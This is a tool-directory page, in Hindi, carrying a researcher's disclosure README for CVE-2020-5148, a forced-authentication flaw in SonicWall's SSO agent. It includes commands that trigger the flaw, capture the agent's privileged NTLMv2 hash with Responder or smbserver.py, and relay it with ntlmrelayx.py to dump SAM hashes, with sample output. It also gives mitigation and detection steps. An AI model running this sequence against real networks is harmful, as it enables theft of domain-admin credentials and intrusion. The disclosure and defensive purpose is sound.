Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-5148 — CVE-2020-5148 - SonicWall UTM SSO एजेंट में जबरन प्रमाणीकरण। एजेंट डोमेन व्यवस्थापक के रूप में अमान्य वर्कस्टेशन की जांच करता है, इसलिए एक आउटबाउंड वेब अनुरोध एक विशेषाधिकार प्राप्त NTLMv2 हैश उत्पन्न करता है। सलाह SNWLID-2021-0003। | Kitploit
उपकरण/GitHubGitHub/l0lsec/cve-2020-5148
पासवर्ड हमलेभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणरेड टीमिंग
GitHubl0lsec/cve-2020-5148

CVE-2020-5148

CVE-2020-5148 - SonicWall UTM SSO एजेंट में जबरन प्रमाणीकरण। एजेंट डोमेन व्यवस्थापक के रूप में अमान्य वर्कस्टेशन की जांच करता है, इसलिए एक आउटबाउंड वेब अनुरोध एक विशेषाधिकार प्राप्त NTLMv2 हैश उत्पन्न करता है। सलाह SNWLID-2021-0003।

61 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट

CVE-2020-5148

SonicWall UTM SSO एजेंट में जबरन प्रमाणीकरण

SonicWall SSO एजेंट किसी दिए गए IP पते के पीछे के उपयोगकर्ता की पहचान उस वर्कस्टेशन को NetAPI (डिफ़ॉल्ट) या WMI से जाँचकर करता है। यह NTLM प्रमाणीकरण शुरू करने से पहले वर्कस्टेशन को मान्य नहीं करता, और सत्र के जीवनकाल तक उसी पते पर पोलिंग करता रहता है।

चूँकि SSO एजेंट सेवा को अपने द्वारा जाँचे जाने वाले हर वर्कस्टेशन और सर्वर पर व्यवस्थापकीय अधिकारों की आवश्यकता होती है, इसे व्यवहार में Domain Admin के रूप में तैनात किया जाता है। इसलिए, कोई भी अनधिकृत पक्ष जो UTM उपकरण के माध्यम से वेब ट्रैफ़िक रूट कर सकता है, एक Domain Admin खाते को अपनी पसंद के होस्ट पर प्रमाणित करवा सकता है, और उस प्रमाणीकरण को कैप्चर या रिले कर सकता है।

CVE-2020-5148 के रूप में प्रकाशित, विक्रेता सलाह SNWLID-2021-0003।

Show Up Show Out Security के Sedric Louissaint द्वारा खोजा और रिपोर्ट किया गया।


सारांश

CVECVE-2020-5148
उत्पादSonicWall UTM उपकरण और SSO एजेंट / डायरेक्टरी सर्विसेज़ कनेक्टर
प्रभावितSSO एजेंट 4.1.10.0; डायरेक्टरी सर्विसेज़ कनेक्टर 4.1.17 और इससे पहले
समाधान संस्करणNVD फिक्स को डायरेक्टरी सर्विसेज़ कनेक्टर 4.1.19 में दर्ज करता है (नीचे दिया गया नोट देखें)
कमजोरीCWE-287: अनुचित प्रमाणीकरण
CVSS 3.1 (NVD)8.2 उच्च CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
CVSS (शोधकर्ता)8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
प्रकाशित2021-03-05
परीक्षण किया गयाMicrosoft Windows Server 2012 R2 Standard
प्रमाणीकरण आवश्यककोई नहीं
विक्रेता सलाहhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0003

NVD विवरण:

SonicWall SSO-एजेंट डिफ़ॉल्ट कॉन्फ़िगरेशन नेटवर्क में संबंधित IP की जाँच करने के लिए NetAPI का उपयोग करता है, यह क्लाइंट जाँच विधि किसी संभावित हमलावर को पासवर्ड हैश कैप्चर करने की अनुमति देती है।

तकनीकी विवरण

इच्छित प्रवाह, और इसके द्वारा छोड़े गए दो चरण

  1. उपयोगकर्ता का ट्रैफ़िक SonicWALL UTM उपकरण तक पहुँचता है।
  2. उपकरण उपयोगकर्ता का IP, SSO एजेंट को "User Name Request" के रूप में भेजता है। ब्लॉक किए गए पैकेट रोक दिए जाते हैं।
  3. SSO एजेंट उस वर्कस्टेशन में लॉग इन उपयोगकर्ता नाम के साथ उत्तर देता है।
  4. LDAP या स्थानीय डेटाबेस समूह सदस्यता को हल करता है।
  5. नीति लागू की जाती है और रोके गए ट्रैफ़िक को जारी किया जाता है।
  6. उपकरण यह पुष्टि करने के लिए SSO एजेंट से पोलिंग करता रहता है कि वही उपयोगकर्ता अभी भी लॉग ऑन है।

SonicWALL SSO प्रवाह, दो अनप्रलेखित चरणों के साथ एनोटेटेड

एनोटेशन उसे चिह्नित करते हैं जिसे विक्रेता आरेख छोड़ देता है:

  • चरण 2.5 SSO एजेंट को वर्कस्टेशन से क्वेरी करने से पहले उसके साथ प्रमाणित होना चाहिए। यह एक आउटबाउंड NTLM हैंडशेक है, जो ट्रैफ़िक उत्पन्न करने वाले द्वारा आपूर्ति किए गए पते पर होता है, बिना उस पते के किसी पूर्व सत्यापन के।
  • चरण 5.5 एजेंट सत्र के जीवनकाल तक हर पोल पर उस प्रमाणीकरण को दोहराता है। पोलिंग अंतराल GUI में कॉन्फ़िगर करने योग्य है।

विशेषाधिकार संदर्भ

SSO एजेंट सेवा को क्वेरी करने के लिए सभी संबंधित वर्कस्टेशनों और सर्वरों पर व्यवस्थापक अधिकारों की आवश्यकता होती है। व्यावहारिक रूप से हर तैनाती में इसका मतलब है कि सेवा खाता Domain Admin है।

बिना सत्यापित होस्ट को सौंपा जाने वाला क्रेडेंशियल इसलिए निर्देशिका का सबसे उच्च-विशेषाधिकार प्राप्त खाता होता है।

SSOAgentService.exe फ़ाइल गुण जो संस्करण 4.1.10.0 दिखा रहे हैं

इसे ट्रिगर करना

कोई एक्सप्लॉइट कोड नहीं है। उपकरण द्वारा संभाले जाने वाले किसी भी सेगमेंट से कोई भी आउटबाउंड वेब अनुरोध पर्याप्त है:

root@kitploit:~
curl sonicwall.com

नेटवर्क सीमा पार करता एक एकल curl कमांड

URL अप्रासंगिक है और अनुरोध को सफल होने की आवश्यकता नहीं है। उपकरण किसी अपरिचित IP से ट्रैफ़िक देखता है, SSO एजेंट से उस उपयोगकर्ता की पहचान करने के लिए कहता है, और एजेंट उस IP से प्रमाणित होता है।

क्रेडेंशियल कैप्चर करना

Responder या smbserver.py सुनने के साथ, एजेंट का NTLMv2 प्रमाणीकरण बिना किसी संकेत के आता है, और पोलिंग व्यवहार के कारण आता रहता है:

root@kitploit:~
[SMB] NTLMv2-SSP Client   : 192.168.x.x
[SMB] NTLMv2-SSP Username : <DOMAIN>\<privileged account>
[SMB] NTLMv2-SSP Hash     : ...

SSO एजेंट से कैप्चर किए गए NTLMv2 हैश

इसे रिले करना

क्रैकिंग वैकल्पिक है। जहाँ SMB साइनिंग लागू नहीं है, वहाँ प्रमाणीकरण को लाइव किसी अन्य होस्ट पर रिले किया जा सकता है, जो कनेक्शन को उसी विशेषाधिकार प्राप्त खाते के रूप में मानता है जो वह प्रतीत होता है:

root@kitploit:~
ntlmrelayx.py -t <target> -smb2support -of <output>
root@kitploit:~
[*] SMBD-Thread-4: Received connection from 192.168.x.x, attacking target smb://192.168.x.x
[*] Authenticating against smb://192.168.x.x as <DOMAIN>\<user> SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Done dumping SAM hashes for host: 192.168.x.x

ntlmrelayx प्रमाणीकरण को रिले करते हुए और SAM हैश डंप करते हुए

प्रमाणीकरण एक बिना प्रमाणीकरण वाले वेब अनुरोध द्वारा ट्रिगर होता है और पूरी तरह से अलग मशीन पर उपभोग किया जाता है, जो सलाह में वर्णित पूर्ण ACL बायपास है।

पुनरुत्पादन

एक लैब में जो आपके पास है या जिसके परीक्षण के लिए आप अधिकृत हैं, SSO के लिए कॉन्फ़िगर किए गए UTM उपकरण और डिफ़ॉल्ट NetAPI क्लाइंट जाँच विधि का उपयोग करने वाले SSO एजेंट के साथ:

  1. उपकरण द्वारा संभाले जाने वाले एक सेगमेंट के अंदर किसी होस्ट पर एक लिसनर शुरू करें:
    root@kitploit:~
    sudo responder -I <interface>
    # or
    sudo smbserver.py c . -smb2support
    
  2. उसी होस्ट से, उपकरण के माध्यम से कोई भी आउटबाउंड वेब ट्रैफ़िक उत्पन्न करें:
    root@kitploit:~
    curl sonicwall.com
    
  3. एक संवेदनशील कॉन्फ़िगरेशन सेकंडों के भीतर SSO एजेंट सेवा खाते से एक इनबाउंड NTLMv2 प्रमाणीकरण उत्पन्न करता है। प्रतीक्षा करें, और यह पोलिंग के कारण दोहराता है।
  4. वैकल्पिक रूप से, कैप्चर करने के बजाय रिले करें, SMB साइनिंग अक्षम वाले होस्ट के विरुद्ध:
    root@kitploit:~
    ntlmrelayx.py -t smb://<second-host> -smb2support -of relayed
    

पूर्ण कमांड अनुक्रम poc/repro.sh में है।

रिपॉजिटरी सामग्री

root@kitploit:~
poc/
  repro.sh       Listener, trigger and relay commands, commented, safe to read first
  notes.md       Why NetAPI triggers this, what WMI changes, detection guidance
media/
  01-sso-flow-annotated.png
  02-curl-crossing-network-boundary.png
  03-ntlmv2-hashes-captured.png
  04-ntlmrelayx-sam-dump.png
  05-sso-agent-version-4.1.10.0.png

कैप्चर में दिखे उपयोगकर्ता नाम, हैश और आंतरिक पते रेडैक्ट किए गए हैं या मूल लैब से हैं।

निवारण

  1. क्लाइंट जाँच को NetAPI से WMI पर स्विच करें। यह विक्रेता का प्रलेखित समाधान (workaround) है और सबसे तेज़ सार्थक बदलाव है।
  2. SSO एजेंट को ऐसे खाते के रूप में न चलाएँ जो हर जगह लॉग इन कर सकता है। administrator को SSO एजेंट सेवा, DC, Exchange सर्वर या टर्मिनल सर्वर के माध्यम से लॉग इन करने की अनुमति न दें। जहाँ खाते को विशेषाधिकार प्राप्त रहना आवश्यक हो, वहाँ एक पासवर्ड का उपयोग करें जो इतना लंबा हो कि ऑफ़लाइन क्रैकिंग यथार्थवादी न हो, बीस या अधिक अक्षर, कभी पुनः उपयोग न किया गया।
  3. डायरेक्टरी सर्विसेज़ कनेक्टर को अपग्रेड करें। NVD फिक्स को 4.1.19 में दर्ज करता है। ध्यान दें कि शोधकर्ता के परीक्षण में, 4.1.19 और बाद के संस्करणों ने अभी भी अंतर्निहित जाँच व्यवहार प्रदर्शित किया और इसे हटाने के बजाय एक चेतावनी सतह पर लाई। चेतावनी एक नियंत्रण नहीं है, इसलिए WMI स्विच और खाता सख्तीकरण को वास्तविक शमन मानें।
  4. पूरे एस्टेट में SMB साइनिंग लागू करें। यह क्रेडेंशियल को कैप्चर होने से नहीं रोकता, लेकिन यह रिले को एक विकल्प के रूप में हटा देता है।
  5. ऐसी सेवाओं पर एक्सटेंडेड प्रोटेक्शन फॉर ऑथेंटिकेशन पर विचार करें जो इसे समर्थन करती हैं, और परिधि पर आउटबाउंड SMB को प्रतिबंधित करें।
  6. इसका पता लगाएँ। SSO एजेंट सेवा खाते से उन होस्ट्स पर प्रमाणीकरण प्रयास जो प्रबंधित वर्कस्टेशन नहीं हैं, उच्च-संकेत वाली घटना है। वैसे ही उस खाते का ऐसे पते पर प्रमाणित होना जो कभी इन्वेंट्री में नहीं आया।

समयरेखा

तिथिघटना
2020SonicWall को खोजा गया और रिपोर्ट किया गया
2021-03-05CVE-2020-5148 प्रकाशित, सलाह SNWLID-2021-0003

लेख

  • व्यक्तिगत खाता: https://sedriclouissaint.com/blog/sonicwall-utm-sso-forced-authentication-cve-2020-5148/
  • Show Up Show Out Security: https://susos.co/blog/authforce-sonicwall-utm-sso-forced-authentication-cve-2020-5148

अस्वीकरण

विक्रेता प्रकटीकरण के बाद प्रकाशित, रक्षात्मक और शैक्षिक उपयोग के लिए। यहाँ कोई एक्सप्लॉइट कोड नहीं है क्योंकि किसी की आवश्यकता नहीं है, जो इस खोज का मुद्दा है। इन कमांडों को उन नेटवर्कों के विरुद्ध न चलाएँ जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित प्राधिकरण नहीं है।

टूल डाउनलोड करें